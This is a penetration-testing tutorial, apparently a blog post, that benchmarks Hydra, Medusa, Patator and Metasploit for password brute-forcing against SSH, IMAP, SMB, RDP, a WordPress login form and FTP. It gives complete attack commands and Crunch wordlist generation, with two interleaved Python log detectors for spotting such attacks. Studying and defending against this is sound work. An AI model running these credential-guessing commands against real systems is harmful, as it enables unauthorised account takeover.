Brute-force from SSH to Web

Nemesida WAF
8 min read · Aug 22, 2019

Brute force (exhaustive search) is usually mentioned in the context of a hacker attack, where an intruder tries to guess the login/password of some account or service. Let’s examine the brute-force tools that ship with Kali Linux: Hydra 8.6, Medusa 2.2, Patator 0.7 and Metasploit Framework 4.17.17-dev. Depending on the protocols each one supports, we will use the most suitable tools. We will generate the password dictionary ourselves using Crunch.

The information is for introduction only. Do not break the law.

Dictionary generation

Crunch

We used a small user dictionary containing only four usernames.

Crunch is the built-in tool we use for dictionary generation. It is flexible and can build a dictionary from a mask. If there is a chance the user picked a dictionary word as a password, it is better to use a ready-made wordlist; as experience shows, the most popular password is «123456».

We will generate a dictionary of 5-character passwords using a mask. This method is used when we can guess the structure of the user’s password.

crunch 5 5 qwe ASD 1234567890 -t @@,%@ -o /root/wordlist.txt

5 5 — the minimum and maximum number of characters (both 5 here);
qwe, ASD, 1234567890 — the lowercase, uppercase and numeric character sets to use;
-t — the key after which the password mask is given;
@ — a lowercase character;
, — an uppercase character;
% — a digit.

Note that we describe the keys of each tool only in the first sections; later we do not repeat this, because the tools are similar and their syntax is the same.

SSH

Patator

patator ssh_login host=192.168.60.50 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:mesg='Authentication failed'

ssh_login — the module;
host — the target;
user — the login for which the password is guessed, or a file with logins to try passwords against;
-x ignore:mesg='Authentication failed' — do not display lines containing this message. The filtering parameter is chosen individually for each case.

We tested all tools with the default number of threads and did not change it. Patator completed the task in 7 minutes 37 seconds, having tried 2235 variants.

Hydra

hydra -f -L /root/username -P /root/wordlist.txt ssh://192.168.60.50

-f — stop as soon as a login/password pair is found;
-L/-P — paths to the user/password dictionaries;
ssh://IP address — the service and the victim’s IP address.

Medusa

medusa -h 192.168.60.50 -U /root/username -P /root/wordlist.txt -M ssh

-h — IP address of the target machine;
-U/-P — paths to the user/password dictionaries;
-M — selects the required module.

Medusa processed only 715 login/password combinations in 25 minutes, so this tool is not the best choice for SSH brute force.

Metasploit

Let’s find a module for brute force over SSH: search ssh_login
Use the module: use auxiliary/scanner/ssh/ssh_login

To see the required parameters use the command «show options», where:

rhosts — victim IP address;
rport — port;
user_file — path to the login dictionary;
pass_file — path to the password dictionary;
stop_on_success — stop as soon as a login/password pair is found.

By default Metasploit uses 1 thread, so the brute-force speed is very low. The attempt to find the password failed.
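The defender’s view of the SSH runs above, as an added example that is not part of the original article: a small Python script that parses sshd log lines, flags a source address that exceeds a failure threshold inside a sliding window, and reports a later «Accepted password» from that address, which is exactly the event a -f / stop_on_success run ends on. The log lines and the source address 192.168.60.23 are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd messages in syslog format (not from the article); 192.168.60.23 is an
# assumed attacker host and the year is assumed to be 2019, since syslog omits it.
SAMPLE_LOG = """\
Aug 22 10:15:01 srv sshd[2001]: Failed password for invalid user test from 192.168.60.23 port 40112 ssh2
Aug 22 10:15:02 srv sshd[2002]: Failed password for invalid user admin from 192.168.60.23 port 40113 ssh2
Aug 22 10:15:02 srv sshd[2003]: Failed password for root from 192.168.60.23 port 40114 ssh2
Aug 22 10:15:03 srv sshd[2004]: Failed password for user from 192.168.60.23 port 40115 ssh2
Aug 22 10:15:04 srv sshd[2005]: Failed password for root from 192.168.60.23 port 40116 ssh2
Aug 22 10:15:05 srv sshd[2006]: Accepted password for user from 192.168.60.23 port 40117 ssh2
Aug 22 10:20:00 srv sshd[2010]: Failed password for alice from 10.0.0.7 port 51000 ssh2
Aug 22 10:21:00 srv sshd[2011]: Accepted password for alice from 10.0.0.7 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse_events(text, year=2019):
    """Yield (timestamp, result, user, ip) for each sshd password event."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(text, threshold=5, window_s=60):
    """Return {ip: (failures_in_window, user_or_None)}. An IP is flagged once it has
    >= threshold failures inside a sliding window of window_s seconds; a later 'Accepted'
    from a flagged IP records the user whose password was most likely guessed."""
    recent = defaultdict(list)
    flagged = {}
    for ts, result, user, ip in parse_events(text):
        if result == "Failed":
            recent[ip].append(ts)
            recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window_s]
            if len(recent[ip]) >= threshold and ip not in flagged:
                flagged[ip] = (len(recent[ip]), None)
        elif ip in flagged and flagged[ip][1] is None:
            flagged[ip] = (flagged[ip][0], user)  # success right after a burst of failures
    return flagged

if __name__ == "__main__":
    for ip, (n, user) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {n} failed logins in window" + (f", then success as '{user}'" if user else ""))
```

The threshold of 5 failures per minute is a starting point; Medusa’s observed rate above (715 attempts in 25 minutes) would still cross it, while Metasploit’s single thread may need a longer window.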

IMAP

Patator

patator imap_login host=192.168.100.109 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:code=1

imap_login — the module used;
-x — parameter that filters Patator’s responses. In this case responses with code 1 are ignored.

The -x parameter is specific to each case, so it is recommended to run the tool without it first, look at the responses, and then decide which ones to ignore.

As a result, Patator found the password in 9 minutes 28 seconds. The result is similar to the SSH one.

Hydra

hydra -f imap://192.168.60.50 -L /root/username -P /root/wordlist.txt

Hydra completed the task in 10 minutes 47 seconds, which is a rather good result.

Medusa

A self-signed certificate was used on the server, so Medusa displayed an error. Attempts to fix it through the tool’s settings failed.

Metasploit

No suitable module was found in Metasploit.

SMB

Patator

Patator produced a lot of false positives.

Hydra

hydra -L /root/username -P /root/wordlist.txt 192.168.60.50 smb

Thanks to its algorithms, Hydra completed the task in 5 seconds.

Medusa

medusa -h 192.168.60.50 -U /root/username -P /root/wordlist.txt -M smbnt

Running the tool, I expected the results to be like the previous ones, but Medusa surprised me and completed the task in a few seconds.

Metasploit

Using search smb_login we find the required module scanner/smb/smb_login and use it. The parameters to set are:

RHOSTS — victim IP address;
USER_FILE — user dictionary;
PASS_FILE — password dictionary;
STOP_ON_SUCCESS — stop as soon as a login/password pair is found.

Metasploit has done the task in 1 minute.

RDP

Patator

patator rdp_login host=192.168.60.50 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:code=132

Unfortunately, at the moment Patator is the only one of the tested tools that can guess a login/password for the RDP protocol. Patator completed the task, but there was a false positive.

WEB

First of all we need to understand the authentication process. To do that, we send test authentication requests and observe the web application’s behaviour: if the password is wrong the response code is 200, and if authentication succeeds the code is 302. We will use this information.

Patator

Taking the web application’s responses into account, build the command for Patator:

patator http_fuzz url=http://site.test.lan/wp-login.php method=POST body='log=FILE0&pwd=FILE1&wp-submit=Log+In&redirect_to=http%3A%2F%2Fsite.test.lan%2Fwp-admin%2F&testcookie=1' 0=/root/username 1=/root/wordlist.txt before_urls=http://site.test.lan/wp-login.php -x ignore:code=200 accept_cookie=1

http_fuzz — module for brute force over HTTP;
url — address of the authentication page;
FILE0/FILE1 — placeholders filled from the user and password dictionaries (0=/root/username, 1=/root/wordlist.txt);
body — data sent in the POST request during authentication;
-t — number of threads;
-x — here we tell Patator not to display responses with code 200;
accept_cookie — save the cookie and pass it into the next request.

As a result we found the password in 30 seconds, which is very fast.

Hydra

As we know, a wrong login returns code 200 and a successful one returns 302. Let’s use this information and run the command:

hydra -f -L /root/username -P /root/wordlist.txt http-post-form://site.test.lan -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fsite.test.lan%2Fwp-admin%2F&testcookie=1:S=302"

-f — stop the brute force as soon as a login/password pair is found;
-L — user dictionary;
-P — password dictionary;
http-post-form — form type (POST);
/wp-login.php — URL of the authentication page;
^PASS^ — where the password from the dictionary is substituted (^USER^ likewise for the login);
S=302 — the response Hydra should treat as success; in our case 302 means successful authentication.

Success came after 3 minutes 15 seconds.

Medusa

medusa -h site.test.lan -U /root/username -P /root/wordlist.txt -M web-form -m FORM:"/wp-login.php" -m FORM-DATA:"post?log=&pwd=&wp-submit=Log+In&redirect_to=http%3A%2F%2Fsite.test.lan%2Fwp-admin%2F&testcookie=1"

Unfortunately, during the brute-force attempt Medusa crashes with a «Segmentation fault» error.

Metasploit

Using search wordpress_login we find the required module auxiliary/scanner/http/wordpress_login_enum and use it. Note the parameters:

PASS_FILE — password dictionary;
RHOSTS — victim IP address;
STOP_ON_SUCCESS — stop as soon as a login/password pair is found;
VALIDATE_USERS — disable the user account check;
VERBOSE — disable extra output;
VHOST — domain name of the attacked site.

It took 32 seconds.
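The same 200/302 behaviour the article relies on is visible to the defender in the web server’s access log. As an added example (not part of the original article), this Python script walks nginx/Apache «combined» log lines, counts POSTs to /wp-login.php answered with 200 per source address inside a sliding window, and notes whether a 302 followed the burst, i.e. the guess most likely succeeded. The log lines and the source address 192.168.60.23 are constructed; site.test.lan is the article’s target.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed "combined" access-log lines (not from the article); 192.168.60.23 is an
# assumed attacker host, 10.0.0.7 an ordinary user who mistyped a password once.
SAMPLE_ACCESS_LOG = """\
192.168.60.23 - - [22/Aug/2019:10:30:00 +0300] "GET /wp-login.php HTTP/1.1" 200 4521 "-" "python-requests/2.22"
192.168.60.23 - - [22/Aug/2019:10:30:00 +0300] "POST /wp-login.php HTTP/1.1" 200 4588 "-" "python-requests/2.22"
192.168.60.23 - - [22/Aug/2019:10:30:01 +0300] "POST /wp-login.php HTTP/1.1" 200 4588 "-" "python-requests/2.22"
192.168.60.23 - - [22/Aug/2019:10:30:01 +0300] "POST /wp-login.php HTTP/1.1" 200 4588 "-" "python-requests/2.22"
192.168.60.23 - - [22/Aug/2019:10:30:02 +0300] "POST /wp-login.php HTTP/1.1" 200 4588 "-" "python-requests/2.22"
192.168.60.23 - - [22/Aug/2019:10:30:02 +0300] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.22"
10.0.0.7 - - [22/Aug/2019:10:31:10 +0300] "POST /wp-login.php HTTP/1.1" 200 4588 "http://site.test.lan/wp-login.php" "Mozilla/5.0"
10.0.0.7 - - [22/Aug/2019:10:31:25 +0300] "POST /wp-login.php HTTP/1.1" 302 0 "http://site.test.lan/wp-login.php" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def login_posts(text):
    """Yield (ip, timestamp, status) for each POST to /wp-login.php (the GET that fetches the form is ignored)."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"].split("?", 1)[0] == "/wp-login.php":
            yield m["ip"], datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), int(m["status"])

def find_form_bruteforce(text, max_failures=4, window_s=60):
    """200 = wrong password, 302 = successful login (WordPress behaviour described above).
    Flag an IP with >= max_failures 200 responses inside window_s seconds and record whether a
    302 followed. Returns {ip: {"failures": n, "success_after_burst": bool}}."""
    recent = defaultdict(list)
    report = {}
    for ip, ts, status in login_posts(text):
        if status == 200:
            recent[ip].append(ts)
            recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window_s]
            if len(recent[ip]) >= max_failures:
                entry = report.setdefault(ip, {"failures": 0, "success_after_burst": False})
                entry["failures"] = len(recent[ip])
        elif status == 302 and ip in report:
            report[ip]["success_after_burst"] = True
    return report

if __name__ == "__main__":
    for ip, info in find_form_bruteforce(SAMPLE_ACCESS_LOG).items():
        print(ip, info)
```

At the rates measured above (a four-user dictionary exhausted in 30 seconds by Patator), even a generous threshold fires within the first minute of the attack.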

FTP

Patator

patator ftp_login host=192.168.60.50 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:code=530

In this module Patator works more slowly than with web forms. The password was found in 11 minutes 20 seconds.

Hydra

hydra -f -L /root/username -P /root/wordlist.txt ftp://192.168.60.50

Running with the default 16 threads, Hydra found the password in 7 minutes 55 seconds.

Metasploit, Medusa

In Metasploit we use the module: use auxiliary/scanner/ftp/ftp_login

In Medusa the request looks like this:

medusa -f -M ftp -U /root/username -P /root/wordlist.txt -h 192.168.60.50

All parameters are standard: we specify the paths to the dictionaries and tell the tool to stop as soon as a login/password pair is found. With this protocol, as with SSH, Medusa and Metasploit cope badly at the default number of threads. So if you want to use only these tools you have to increase the thread count manually, which is not so easy. In single-thread mode the FTP server dropped the connection for these tools; this did not happen with Patator or Hydra. So it is possible that increasing the number of threads would not change the situation.

Conclusion

After testing these different but similar tools against various services, we can say that every tool has its own advantages and disadvantages; which tool to use is your decision. Below is a summary table with the test results we obtained:

You can practise without breaking the law in our laboratories at lab.pentestit.ru.
